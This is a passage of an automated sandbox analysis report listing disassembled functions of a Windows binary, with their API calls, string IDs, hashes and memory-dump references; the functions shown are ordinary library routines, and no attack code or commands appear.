                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Screen$Type
                                                                                  • API String ID: 3519838083-617370513
                                                                                  • Opcode ID: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                  • Instruction ID: 4d38a4c78756a561892016d3518d24bbf6b374d1b1301723247150b4428ad458
                                                                                  • Opcode Fuzzy Hash: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                  • Instruction Fuzzy Hash: 1831A6307102149BCB25BF658451AFEB762AF80B04F04855FF816AB2C2CB7C9E469789
                                                                                  Function 004A927C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004A9281
                                                                                  • VariantClear.OLEAUT32(?), ref: 004A9341
                                                                                    • Part of subcall function 004AB12B: __EH_prolog.LIBCMT ref: 004AB130
                                                                                    • Part of subcall function 004AB12B: VariantClear.OLEAUT32(?), ref: 004AB1E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearH_prologVariant
                                                                                  • String ID: X4M
                                                                                  • API String ID: 1166855276-782854336
                                                                                  • Opcode ID: 4d9978b7b49e5079a5f49edacf5ba3a110c924e8dd4b464c328a5faee1f290b2
                                                                                  • Instruction ID: d35cd14c38ddb02f725ab8eef168f06c7b04d4648675df1089dad66c7426fc66
                                                                                  • Opcode Fuzzy Hash: 4d9978b7b49e5079a5f49edacf5ba3a110c924e8dd4b464c328a5faee1f290b2
                                                                                  • Instruction Fuzzy Hash: 51318D74200740AFCB24DFA5C498A6EB7F9EF4A318B10486EF14B87291CB78AC45CB14
                                                                                  Function 00424104 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424126
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol
                                                                                  • String ID: Enabled$Visible
                                                                                  • API String ID: 386204849-1194824832
                                                                                  • Opcode ID: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                  • Instruction ID: 727e803c07ceded52639f44ab80efcc3192eb2c7be4f64242e16063d67e17eca
                                                                                  • Opcode Fuzzy Hash: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                  • Instruction Fuzzy Hash: 0321043220952536DA0676269C87EEF325D8F86378F30070FF921651D2EF6D669343AE
                                                                                  Function 00480B51 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: ZipFileCRCData$ZipFileCRCInfo
                                                                                  • API String ID: 3519838083-379976688
                                                                                  • Opcode ID: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                  • Instruction ID: bf1fec61cde53dc7334019232a03e174b5150932d6ab1f9396e4793b92ea1ffe
                                                                                  • Opcode Fuzzy Hash: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                  • Instruction Fuzzy Hash: 0921E431A102009BDB58FB628851BBEB3A5AF81358F044A1FE416AB2C1DB7CAD45C758
                                                                                  Function 00485080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • table contains non-strings, xrefs: 00485116
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftol
                                                                                  • String ID: table contains non-strings
                                                                                  • API String ID: 495808979-358882004
                                                                                  • Opcode ID: 7fb775a7036710396cf49c3872037d8726796ce57ce4cd42912a57135190fffa
                                                                                  • Instruction ID: f0051007b889ad52c1cbaa29481e0a2713751258d8b3677a9764e389807993ab
                                                                                  • Opcode Fuzzy Hash: 7fb775a7036710396cf49c3872037d8726796ce57ce4cd42912a57135190fffa
                                                                                  • Instruction Fuzzy Hash: E8219976A5071132D620B966AD87FAF315D9F55B09F040C2FFA00662C2F9DEA60543BF
                                                                                  Function 0045802F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 0045807D
                                                                                  • OffsetRect.USER32(?,?,?), ref: 004580C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorOffsetRect
                                                                                  • String ID: R
                                                                                  • API String ID: 1473908254-1466425173
                                                                                  • Opcode ID: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                  • Instruction ID: b24df7492ff9630f9153139915470f7fb99dadaa0dd5e0d8afb21a39ace5a7f1
                                                                                  • Opcode Fuzzy Hash: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                  • Instruction Fuzzy Hash: E5318D7160061AEFCF14EFA5C8849AEBBB9FF48315B00402EFA4597242CB35A955CF94
                                                                                  Function 0048044B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Event$Events
                                                                                  • API String ID: 3519838083-2431416839
                                                                                  • Opcode ID: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                  • Instruction ID: 0449487f76448c15c9ca2abf4542bc0cedd1a6ef3351e798faa6b9fdc01194ba
                                                                                  • Opcode Fuzzy Hash: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                  • Instruction Fuzzy Hash: 2621B531750204ABDF54BF6688917BE73A5AB80B08F00893FA9169B281CB7C9D49CB58
                                                                                  Function 00428515 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042851A
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                  • ShellExecuteA.SHELL32(00000000,print,00000000,?,00000000,00523A30), ref: 004285A0
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell
                                                                                  • String ID: print
                                                                                  • API String ID: 254888685-366378086
                                                                                  • Opcode ID: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                  • Instruction ID: ee7be14681b1b8fb26f5df937825c69c377f3cbfc24692162d5aaee1b3869af0
                                                                                  • Opcode Fuzzy Hash: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                  • Instruction Fuzzy Hash: 3821C475D04218BBCF15EBAAD806BDEBF74EF04314F10406FF405B2182DB795B858AA9
                                                                                  Function 00480978 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0048097D
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: CRC$ZipFileCRCData
                                                                                  • API String ID: 3164693477-3255046153
                                                                                  • Opcode ID: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                  • Instruction ID: 6ddc117d37461e98a407975368472051323615dc9f506777e19718c44266dbe0
                                                                                  • Opcode Fuzzy Hash: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                  • Instruction Fuzzy Hash: C721BE72911508AFD708EB61CD42EFEB778EB51314F10422EF426A31D1EB786B498665
                                                                                  Function 00430EE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430EEE
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiOpenProductA), ref: 00430F34
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressLibraryLoadProc
                                                                                  • String ID: MsiOpenProductA
                                                                                  • API String ID: 2554327035-114103595
                                                                                  • Opcode ID: e29535037e22898d3f5464ca9e0c41be4a6d94de105db846caa2db8b22467da9
                                                                                  • Instruction ID: 8415b69ef21821a5ab4b66b09f391df716a4a7af37ee754a110b5adfbc410815
                                                                                  • Opcode Fuzzy Hash: e29535037e22898d3f5464ca9e0c41be4a6d94de105db846caa2db8b22467da9
                                                                                  • Instruction Fuzzy Hash: 32113636A00605BACB24BB62DC12FEF37289F85314F10451FF41AA61C1DBBC868186AD
                                                                                  Function 00430FAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430FB0
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiOpenPackageA), ref: 00430FF6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressLibraryLoadProc
                                                                                  • String ID: MsiOpenPackageA
                                                                                  • API String ID: 2554327035-784502742
                                                                                  • Opcode ID: 894692f1d2c7bb41fd8905682940fb2dde76402c2d1189b37876e03216c60835
                                                                                  • Instruction ID: b28cc983e29b2d26dfbad047f6cd305975f546a29a52b38c04570462af574641
                                                                                  • Opcode Fuzzy Hash: 894692f1d2c7bb41fd8905682940fb2dde76402c2d1189b37876e03216c60835
                                                                                  • Instruction Fuzzy Hash: C4113336900204BACB04BBA2DC02BEF3738EF85354F10442FF412A61C1DB7C8A8286AD
                                                                                  Function 00484540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftol
                                                                                  • String ID: cur$invalid mode
                                                                                  • API String ID: 495808979-3413740846
                                                                                  • Opcode ID: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                  • Instruction ID: 62864d8fd425b32e9b942a475de88a9d3126e450f522763bc0ab3dfddb68d389
                                                                                  • Opcode Fuzzy Hash: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                  • Instruction Fuzzy Hash: BF019672B4131033E511766A6C83FAF368C8FD2759F14092BF740691C3E79A661143EE
                                                                                  Function 00424064 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424089
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog__ftol
                                                                                  • String ID: Enabled$Visible
                                                                                  • API String ID: 2123048387-1194824832
                                                                                  • Opcode ID: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                  • Instruction ID: a06317538c8d1a01a9211c07e988773db040fce767a5f3220770bb9cebb87b49
                                                                                  • Opcode Fuzzy Hash: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                  • Instruction Fuzzy Hash: BB01263610592476D6027B669C02FCF361C9F46358F14040FF91419092EF6E628383EE
                                                                                  Function 0043074D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430752
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiVerifyPackageA), ref: 00430791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
